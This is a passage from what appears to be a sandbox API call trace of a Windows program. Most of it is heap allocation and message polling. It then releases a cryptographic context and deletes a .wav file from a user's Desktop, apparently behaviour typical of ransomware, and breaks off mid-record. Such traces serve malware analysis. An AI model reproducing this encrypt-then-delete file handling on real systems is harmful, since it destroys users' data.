hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0127.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0127.283] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0127.283] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0127.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0127.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0127.283] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0127.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0127.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0127.283] PeekMessageW (in: lpMsg=0x144ec64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec64) returned 0 [0127.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0127.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0127.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0127.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0127.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0127.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0127.283] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0127.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0127.284] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0127.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0127.284] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0127.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0127.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0127.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0127.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0127.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0127.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0127.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0127.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0127.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0127.285] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0127.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0127.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0127.285] PeekMessageW (in: lpMsg=0x144ec54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ec54) returned 0 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0127.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0127.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0127.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0127.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0127.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0127.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0127.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0127.285] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0127.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0127.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0127.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0127.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0127.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0127.287] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0127.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0127.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0127.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0127.287] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0127.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0127.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0127.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0127.288] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.288] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0127.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0127.289] FreeLibrary (hLibModule=0x756e0000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0127.289] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0127.289] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0127.289] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.289] CloseHandle (hObject=0x258) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb450 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0127.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0127.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0127.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0127.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0127.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0127.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0127.290] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0127.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0127.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0127.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0127.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0127.290] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0127.290] CloseHandle (hObject=0x2a0) returned 1 [0127.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0127.292] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0127.292] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMWtJGFcI6Q-91k75WQc.wav", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\WMWtJGFcI6Q-91k75WQc.wav", lpFilePart=0x0) returned 0x30 [0127.292] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMWtJGFcI6Q-91k75WQc.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\wmwtjgfci6q-91k75wqc.wav")) returned 0x20 [0127.403] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMWtJGFcI6Q-91k75WQc.wav", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726794b0, ftCreationTime.dwHighDateTime=0x1d5eaec, ftLastAccessTime.dwLowDateTime=0x835e97a0, ftLastAccessTime.dwHighDateTime=0x1d5f0e1, ftLastWriteTime.dwLowDateTime=0x835e97a0, ftLastWriteTime.dwHighDateTime=0x1d5f0e1, nFileSizeHigh=0x0, nFileSizeLow=0xdae9, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="WMWtJGFcI6Q-91k75WQc.wav", cAlternateFileName="WMWTJG~1.WAV")) returned 0x41ac600 [0127.403] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\WMWtJGFcI6Q-91k75WQc.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\wmwtjgfci6q-91k75wqc.wav")) returned 1 [0127.548] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726794b0, 